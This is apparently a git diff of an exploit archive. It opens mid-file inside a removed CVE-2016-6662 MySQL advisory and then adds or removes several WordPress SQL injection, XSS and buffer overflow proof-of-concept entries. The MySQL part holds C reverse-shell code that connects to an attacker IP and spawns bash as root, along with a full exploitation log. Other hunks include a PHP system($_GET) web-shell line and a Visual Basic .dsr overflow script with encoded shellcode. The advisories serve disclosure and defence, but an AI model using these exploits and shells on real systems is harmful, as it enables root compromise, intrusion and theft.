srv_addr.sin_addr.s_addr = inet_addr(ATTACKERS_IP); // connect-back ip - - // create new TCP socket && connect - sockfd = socket( AF_INET, SOCK_STREAM, IPPROTO_IP ); - connect(sockfd, (struct sockaddr *)&srv_addr, sizeof(srv_addr)); - - for(i = 0; i <= 2; i++) dup2(sockfd, i); - execle( "/bin/bash", "/bin/bash", "-i", NULL, env_list ); - - exit(0); -} - - -/* - cleanup injected data from the target config before it is read by mysqld - in order to ensure clean startup of the service - - The injection (if done via logging) will start with a line like this: - - /usr/sbin/mysqld, Version: 5.5.50-0+deb8u1 ((Debian)). started with: - -*/ - -int config_cleanup() { - - FILE *conf; - char buffer[2000]; - long cut_offset=0; - - conf = fopen(INJECTED_CONF, "r+"); - if (!conf) return 1; - - while (!feof(conf)) { - fgets(buffer, sizeof(buffer), conf); - if (strstr(buffer,"/usr/sbin/mysqld, Version")) { - cut_offset = (ftell(conf) - strlen(buffer)); - } - - } - if (cut_offset>0) ftruncate(fileno(conf), cut_offset); - fclose(conf); - return 0; - -} - - -// execvp() hook -int execvp(const char* filename, char* const argv[]) { - - pid_t pid; - int fd; - - // Simple root PoC (touch /root/root_via_mysql) - fd = open("/root/root_via_mysql", O_CREAT); - close(fd); - - old_execvp = dlsym(RTLD_NEXT, "execvp"); - - // Fork a reverse shell and execute the original execvp() function - pid = fork(); - if (pid == 0) - reverse_shell(); - - // clean injected payload before mysqld is started - config_cleanup(); - return old_execvp(filename, argv); -} - - ------------------------------------------------- - - - - -Replication / testing: -~~~~~~~~~~~~~~~~~~ - -As admin on the target system: -~~~~~~~~ - -1. Set up a test database account/permissions: - -CREATE DATABASE pocdb; -GRANT FILE ON *.* TO 'attacker'@'%' IDENTIFIED BY 'p0cpass!'; -GRANT SELECT, INSERT, CREATE ON `pocdb`.* TO 'attacker'@'%'; - - -2. Simulate write access on any of available mysql configs. -It just needs to be a valid/parsable config with section e.g: - -[isamchk] -key_buffer = 16M - -For example, /etc/mysql/my.cnf on Debian: - -# chown mysql:mysql /etc/mysql/my.cnf - -# ls -l /etc/mysql/my.cnf --rw-r--r-- 1 mysql mysql 3534 Sep 11 02:15 /etc/mysql/my.cnf - -3. Run the exploit as the attacker and restart mysql when exploit -is done. - -Note that attackers could be able to force this step remotely by -issuing a remote SHUTDOWN command/SQL statement. - - -As attacker: -~~~~~~~~ - -1. Enter your library path in mysql_hookandroot_lib.c src. - -2. Run the 0ldSQL_MySQL_RCE_exploit.py script. - - -Example run: -~~~~~~~~ - -attacker$ ./0ldSQL_MySQL_RCE_exploit.py -dbuser attacker -dbpass 'p0cpass!' -dbhost 192.168.1.10 -dbname pocdb -mycnf /etc/mysql/my.cnf - -0ldSQL_MySQL_RCE_exploit.py (ver. 1.0) -(CVE-2016-6662) MySQL Remote Root Code Execution / Privesc PoC Exploit - -For testing purposes only. Do no harm. - -Discovered/Coded by: - -Dawid Golunski -http://legalhackers.com - - -[+] Connecting to target server 192.168.1.10 and target mysql account 'attacker@192.168.1.10' using DB 'pocdb' - -[+] The account in use has the following grants/perms: - -GRANT FILE ON *.* TO 'attacker'@'%' IDENTIFIED BY PASSWORD -GRANT SELECT, INSERT, CREATE ON `pocdb`.* TO 'attacker'@'%' - -[+] Compiling mysql_hookandroot_lib.so - -[+] Converting mysql_hookandroot_lib.so into HEX - -[+] Saving trigger payload into /var/lib/mysql/pocdb/poctable.TRG - -[+] Dumping shared library into /var/lib/mysql/mysql_hookandroot_lib.so file on the target - -[+] Creating table 'poctable' so that injected 'poctable.TRG' trigger gets loaded - -[+] Inserting data to `poctable` in order to execute the trigger and write data to the target mysql config /etc/mysql/my.cnf - -[+] Showing the contents of /etc/mysql/my.cnf config to verify that our setting (malloc_lib) got injected - -[mysql] -#no-auto-rehash # faster start of mysql but no tab completition - -[isamchk] -key_buffer = 16M - -!includedir /etc/mysql/conf.d/ -/usr/sbin/mysqld, Version: 5.5.50-0+deb8u1 ((Debian)). started with: -Tcp port: 3306 Unix socket: /var/run/mysqld/mysqld.sock -Time Id Command Argument -160912 8:48:41 44 Query select " - -# 0ldSQL_MySQL_RCE_exploit got here :) - -[mysqld] -malloc_lib='/var/lib/mysql/mysql_hookandroot_lib.so' - -[abyss] -" INTO void - 44 Query SET global general_log = off - -[+] Looks messy? Have no fear, the preloaded lib mysql_hookandroot_lib.so will clean up all the mess before mysqld daemon even reads it :) - -[+] Everything is set up and ready. Spawning netcat listener and waiting for MySQL daemon to get restarted to get our rootshell... :) - -listening on [any] 6033 ... - -connect to [192.168.1.20] from dbserver [192.168.1.10] 36932 -bash: cannot set terminal process group (963): Inappropriate ioctl for device -bash: no job control in this shell - -root@debian:/# id -id -uid=0(root) gid=0(root) groups=0(root) - -root@debian:/# ls -l /root/root_via_mysql ----------- 1 root root 0 Sep 10 22:50 /root/root_via_mysql - - -root@debian:/# exit -exit -exit - -[+] Shell closed. Hope you had fun. - -[+] Stay tuned for the CVE-2016-6663 advisory and/or a complete PoC that can craft a new valid my.cnf (i.e no writable my.cnf required) ;) - -[+] Exiting (code: 0) - - - -VII. BUSINESS IMPACT -------------------------- - -As discussed above the vulnerability could be exploited by attackers with both -privileged and unprivileged (with FILE privilege only) access to mysql accounts. -It could also be combined with CVE-2016-6663 vulnerability which will be released -shortly and could allow certain attackers to escalate their privileges to root -even without FILE privilege. - -The vulnerability could also be exploited via an SQL injection vector, which -removes the need for the attackers to have direct mysql connection and increases -the risk of exploitation. - -Successful exploitation could gain a attacker a remote shell with root privileges -which would allow them to fully compromise the remote system. - -If exploited, the malicious code would run as soon as MySQL daemon gets -restarted. -As mentioned, the restart could be triggered manually, via a system update, -package update (including an update of dependencies), system reboot etc.). -Attackers might also be able to speed up the server restart remotely by issuing -a SHUTDOWN SQL statement or 'shutdown' command via mysqladmin. - - - -VIII. SYSTEMS AFFECTED -------------------------- - -All MySQL versions from the oldest versions to the latest shown at the beginnig -of this advisory. - -Some systems run MySQL via Systemd and provide direct startup path to mysqld -daemon instead of using mysqld_safe wrapper script. These systems however are -also at risk as mysqld_safe may be called on update by the installation scripts -or some other system services. It could also be triggered manually by -administrators running mysqld_safe as a habit. - -Because the exploit only accesses files normally used by MySQL server ( -such as the config), and the injected library is preloaded by mysqld_safe startup -scripta not included within the default policies, the vulnerability can be -exploited even if security modules as SELinux and AppArmor are installed with -active security policies for the MySQL daemon. - - -IX. VENDOR RESPONSE / SOLUTION -------------------------- - -The vulnerability was reported to Oracle on 29th of July 2016 and triaged -by the security team. -It was also reported to the other affected vendors including PerconaDB and MariaDB. - -The vulnerabilities were patched by PerconaDB and MariaDB vendors in all branches -by 30th of August. -During the course of the patching process by these vendors the patches went into -public repositories and the fixed security issues were also mentioned in the -new releases which could be noticed by malicious attackers. - -As over 40 days have passed since reporting the issues and patches were already -mentioned publicly (by Percona and MariaDB) , a decision was made to start -disclosing vulnerabilities (with limited PoC) to inform users about the risks -before the vendor's next CPU update (scheduled for 18th of October). - -No official patches or mitigations are available at this time from the vendor. -As temporary mitigations, users should ensure that no mysql config files are -owned by mysql user, and create root-owned dummy my.cnf files that are not in -use. -These are by no means a complete solution and users should apply official vendor -patches as soon as they become available. - -Update (16/09/2016): -It has been found that the vendor silently (i.e. without notifing the researcher -via a direct communication despite the ongoing private communication via email, -nor via releasing an immediate public Security Alert to publicly announce the -critical fixes) released security patches for the CVE-2016-6662 vulnerability in -the following releases: - -https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-15.html -https://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-33.html -https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-52.html - -which changes the vulnerable/exploitable version list to the following: - -MySQL <= 5.7.14 - 5.6.32 - 5.5.51 - - -X. REFERENCES -------------------------- - -http://legalhackers.com - -http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html - -Source codes from the advisory: -http://legalhackers.com/exploits/0ldSQL_MySQL_RCE_exploit.py - -http://legalhackers.com/exploits/mysql_hookandroot_lib.c - -MySQL releases containing security fixes: -https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-52.html -https://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-33.html -https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-15.html -which can be downloaded from: -http://dev.mysql.com/downloads/mysql/ - -https://mariadb.org/mariadb-server-versions-remote-root-code-execution-vulnerability-cve-2016-6662/ - -https://security-tracker.debian.org/tracker/CVE-2016-6662 - -https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6662 - -The old vulnerability fixed in MySQL version 3.23.55: -https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0150 - - -XI. CREDITS -------------------------- - -The vulnerability has been discovered by Dawid Golunski -dawid (at) legalhackers (dot) com -http://legalhackers.com - -XII. REVISION HISTORY -------------------------- - -12.09.2016 - Advisory released publicly as 0day -16.09.2016 - Updated the IV section with important notes to clarify - misconceptions observed on some security forums. -16.09.2016 - Updated the IX section to add information about fixed releases - along with I and II sections to reflect these. -22.09.2016 - Updated V. 3) section and fixed some typos. -23.09.2016 - Added notes about potential use of SHUTDOWN command/SQL statement - that remote attackers could use in order to speed up the restart. - -XIII. LEGAL NOTICES -------------------------- - -The information contained within this advisory is supplied "as-is" with -no warranties or guarantees of fitness of use or otherwise. I accept no -responsibility for any damage caused by the use or misuse of this information. - diff --git a/platforms/multiple/remote/39258.txt b/platforms/multiple/remote/39258.txt index 8bf338c1c..f6b4deccc 100755 --- a/platforms/multiple/remote/39258.txt +++ b/platforms/multiple/remote/39258.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/68 +source: http://www.securityfocus.com/bid/68/info http://www.example.com/alfresco/proxy?endpoint=http://internal_system:port 663/info diff --git a/platforms/multiple/remote/39259.txt b/platforms/multiple/remote/39259.txt index 83ec1b78a..3038825e6 100755 --- a/platforms/multiple/remote/39259.txt +++ b/platforms/multiple/remote/39259.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/68 +source: http://www.securityfocus.com/bid/68/info http://www.example.com/alfresco/proxy?endpoint=http://internal_system:port 663/info diff --git a/platforms/php/webapps/27671.txt b/platforms/php/webapps/27671.txt deleted file mode 100755 index 3b9a5d435..000000000 --- a/platforms/php/webapps/27671.txt +++ /dev/null @@ -1,11 +0,0 @@ -source: http://www.securityfocus.com/bid/17581/info - -LinPHA is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. - -An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. - -LinPHA 1.1.0 is reported vulnerable. Other versions may be affected as well. - -http://www.example.com/plugins/stats/stats_view.php?date_from=[XSS] -http://www.example.com/plugins/stats/stats_view.php?date_to=[XSS] -http://www.example.com/plugins/stats/stats_view.php?date=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/28966.txt b/platforms/php/webapps/28966.txt deleted file mode 100755 index 6e300f36d..000000000 --- a/platforms/php/webapps/28966.txt +++ /dev/null @@ -1,11 +0,0 @@ -source: http://www.securityfocus.com/bid/20998/info - -Drake CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. - -An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. - -Version 0.2 is vulnerable; other versions may also be affected. - -NOTE: This BID is being retired because reports indicate that this issue is not exploitable. - -http://www.example.com//index.php?option=contact&Itemid=10&task=category&id=alert(764606807)%3B \ No newline at end of file diff --git a/platforms/php/webapps/29495.txt b/platforms/php/webapps/29495.txt deleted file mode 100755 index 8cf5c5152..000000000 --- a/platforms/php/webapps/29495.txt +++ /dev/null @@ -1,7 +0,0 @@ -source: http://www.securityfocus.com/bid/22115/info - -The 'sabros.us' application is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. - -An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. - -http://www.example.com/index.php?tag= \ No newline at end of file diff --git a/platforms/php/webapps/31060.txt b/platforms/php/webapps/31060.txt deleted file mode 100755 index 49bf805d9..000000000 --- a/platforms/php/webapps/31060.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/27459/info - -Drake CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. - -An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. - -Drake CMS 0.4.9 is vulnerable; other versions may also be affected. - -http://www.example.com/[path]/index.php?option="'>&Itemid=12 \ No newline at end of file diff --git a/platforms/php/webapps/31657.txt b/platforms/php/webapps/31657.txt deleted file mode 100755 index dd2bce796..000000000 --- a/platforms/php/webapps/31657.txt +++ /dev/null @@ -1,11 +0,0 @@ -source: http://www.securityfocus.com/bid/28810/info - -Blogator-script is prone to a cross-site scripting vulnerability because it fails to adequately sanitize user-supplied input. - -An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. - -Blogator-script 0.95 is affected; other versions may also be vulnerable. - -http://www.example.com/BS0.95/Blogator-script/bs_auth.php?msg=[XSS] - - diff --git a/platforms/php/webapps/32103.txt b/platforms/php/webapps/32103.txt deleted file mode 100755 index fff0e2fb1..000000000 --- a/platforms/php/webapps/32103.txt +++ /dev/null @@ -1,11 +0,0 @@ -source: http://www.securityfocus.com/bid/30334/info - -VisualPic is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. - -An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. - -VisualPic 0.3.1 is vulnerable; other versions may be affected as well. - -http://www.example.com/visualpic/?login&pic=>"> -http://www.example.com/visualpic/?pic=%00'"> -http://www.example.com/visualpic/?login&pic=>"> \ No newline at end of file diff --git a/platforms/php/webapps/32905.txt b/platforms/php/webapps/32905.txt deleted file mode 100755 index bcd4b4ed0..000000000 --- a/platforms/php/webapps/32905.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/34500/info - -LinPHA is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data. - -Attackers can leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help attackers steal cookie-based authentication credentials and launch other attacks. - -Versions prior to LinPHA 1.3.4 are vulnerable. - -http://www.example.com/linpha-1.3.2/login.php?ref='> \ No newline at end of file diff --git a/platforms/php/webapps/32906.txt b/platforms/php/webapps/32906.txt deleted file mode 100755 index 17fbd5c1c..000000000 --- a/platforms/php/webapps/32906.txt +++ /dev/null @@ -1,10 +0,0 @@ -source: http://www.securityfocus.com/bid/34500/info - -LinPHA is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data. - -Attackers can leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help attackers steal cookie-based authentication credentials and launch other attacks. - -Versions prior to LinPHA 1.3.4 are vulnerable. - -http://www.example.com/test/linpha-1.3.2/new_images.php?order=%22%3Cscript%3Ealert(1)%3C/script%3E -http://www.example.com/test/linpha-1.3.2/new_images.php?pn=%22%3Cscript%3Ealert(1)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/34154.txt b/platforms/php/webapps/34154.txt deleted file mode 100755 index 16773a160..000000000 --- a/platforms/php/webapps/34154.txt +++ /dev/null @@ -1,7 +0,0 @@ -source: http://www.securityfocus.com/bid/40914/info - -Software Index is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. - -An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and to launch other attacks. - -http://www.example.com/signinform.php?msg=/">indoushka \ No newline at end of file diff --git a/platforms/php/webapps/40771.txt b/platforms/php/webapps/40771.txt new file mode 100755 index 000000000..7a1d7eb99 --- /dev/null +++ b/platforms/php/webapps/40771.txt @@ -0,0 +1,31 @@ +# Exploit Title: Answer My Question 1.3 Plugin for WordPress – Sql Injection +# Date: 10/11/2016 +# Exploit Author: Lenon Leite +# Vendor Homepage: https://wordpress.org/plugins/answer-my-question/ +# Software Link: https://wordpress.org/plugins/answer-my-question/ +# Contact: http://twitter.com/lenonleite +# Website: http://lenonleite.com.br/ +# Category: webapps +# Version: 1.3 +# Tested on: Windows 8.1 + +1 - Description + +$_POST['id'] is not escaped. Url is accessible for any user. + +http://lenonleite.com.br/en/blog/2016/11/11/answer-my-question-1-3-plugin-for-wordpress-sql-injection/ + +2 - Proof of Concept + +
+ + +
+ +3. Solution + + +-- +Atenciosamente + +Lenon Leite diff --git a/platforms/php/webapps/40772.txt b/platforms/php/webapps/40772.txt new file mode 100755 index 000000000..d1e0cfb73 --- /dev/null +++ b/platforms/php/webapps/40772.txt @@ -0,0 +1,37 @@ +# Exploit Title: Sirv 1.3.1 Plugin For WordPress Sql Injection +# Date: 10/11/2016 +# Exploit Author: Lenon Leite +# Vendor Homepage: https://wordpress.org/plugins/sirv/ +# Software Link: https://wordpress.org/plugins/sirv/ +# Contact: http://twitter.com/lenonleite +# Website: http://lenonleite.com.br/ +# Category: webapps +# Version: 1.3.1 +# Tested on: Windows 8.1 + + +1 - Description + +$_POST[ ‘id’ ] is not escaped. sirv_get_row_by_id() is accessible for every +registered user. + +http://lenonleite.com.br/en/blog/2016/11/10/sirv-1-3-1-plugin-for-wordpress/ + +2. Proof of Concept + +Login as regular user. + +
+ + + +
+ + 3. Solution: + +Update to version 1.3.2 + +-- +Atenciosamente + +Lenon Leite diff --git a/platforms/php/webapps/5392.php b/platforms/php/webapps/5392.php index 6d8cf0116..0002fd2be 100755 --- a/platforms/php/webapps/5392.php +++ b/platforms/php/webapps/5392.php @@ -65,7 +65,7 @@ 408. for example: 409. User : login failed! <== oops! ;) 410. will be replaced by: - 411. User <?php echo system($_GET['cwd']); ?>: login failed! + 411. User : login failed! */ diff --git a/platforms/windows/dos/40773.html b/platforms/windows/dos/40773.html new file mode 100755 index 000000000..0b7cf10ec --- /dev/null +++ b/platforms/windows/dos/40773.html @@ -0,0 +1,17 @@ + + + + + + + diff --git a/platforms/windows/local/5361.py b/platforms/windows/local/5361.py deleted file mode 100755 index 777627510..000000000 --- a/platforms/windows/local/5361.py +++ /dev/null @@ -1,111 +0,0 @@ -#usage: exploit.py - -print "-----------------------------------------------------------------------" -print ' [PoC 2] MS Visual Basic Enterprise Ed. 6 SP6 ".dsr" File Handling BoF\n' -print " author: shinnai" -print " mail: shinnai[at]autistici[dot]org" -print " site: http://shinnai.altervista.org\n" -print " Once you create the file, open it with Visual Basic 6 and click on" -print " command name." -print "-----------------------------------------------------------------------" - -buff = "A" * 555 - -get_EIP = "\xFF\xBE\x3F\x7E" #call ESP from user32.dll - -nop = "\x90" * 12 - -shellcode = ( - "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" - "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" - "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" - "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" - "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34" - "\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47" - "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38" - "\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48" - "\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c" - "\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e" - "\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58" - "\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44" - "\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38" - "\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33" - "\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47" - "\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a" - "\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b" - "\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33" - "\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37" - "\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59" - "\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56" - "\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a" - ) - -dsrfile = ( - "VERSION 5.00\n" - "Begin {C0E45035-5775-11D0-B388-00A0C9055D8E} DataEnvironment1\n" - " ClientHeight = 6315\n" - " ClientLeft = 0\n" - " ClientTop = 0\n" - " ClientWidth = 7980\n" - " _ExtentX = 14076\n" - " _ExtentY = 11139\n" - " FolderFlags = 1\n" - ' TypeLibGuid = "{D7133993-3B5A-4667-B63B-749EF16A1840}"\n' - ' TypeInfoGuid = "{050E7898-66AC-4150-A213-47C7725D7E7E}"\n' - " TypeInfoCookie = 0\n" - " Version = 4\n" - " NumConnections = 1\n" - " BeginProperty Connection1\n" - ' ConnectionName = "Connection1"\n' - " ConnDispId = 1001\n" - " SourceOfData = 3\n" - ' ConnectionSource= ""\n' - " Expanded = -1 'True\n" - " QuoteChar = 96\n" - " SeparatorChar = 46\n" - " EndProperty\n" - " NumRecordsets = 1\n" - " BeginProperty Recordset1\n" - ' CommandName = "Command1"\n' - " CommDispId = 1002\n" - " RsDispId = 1003\n" - ' CommandText = "' + buff + get_EIP + nop + shellcode + nop + '"\n' - ' ActiveConnectionName= "Connection1"\n' - " CommandType = 2\n" - " dbObjectType = 1\n" - " Locktype = 3\n" - " IsRSReturning = -1 'True\n" - " NumFields = 1\n" - " BeginProperty Field1\n" - " Precision = 10\n" - " Size = 4\n" - " Scale = 0\n" - " Type = 3\n" - ' Name = "ID"\n' - ' Caption = "ID"\n' - " EndProperty\n" - " NumGroups = 0\n" - " ParamCount = 0\n" - " RelationCount = 0\n" - " AggregateCount = 0\n" - " EndProperty\n" - "End\n" - 'Attribute VB_Name = "DataEnvironment1"\n' - "Attribute VB_GlobalNameSpace = False\n" - "Attribute VB_Creatable = True\n" - "Attribute VB_PredeclaredId = True\n" - "Attribute VB_Exposed = False\n" - ) - -try: - out_file = open("DataEnvironment1.dsr",'w') - out_file.write(dsrfile) - out_file.close() - print "\nFILE CREATION COMPLETED!\n" -except: - print " \n -------------------------------------" - print " Usage: exploit.py" - print " -------------------------------------" - print "\nAN ERROR OCCURS DURING FILE CREATION!" - -# milw0rm.com [2008-04-04]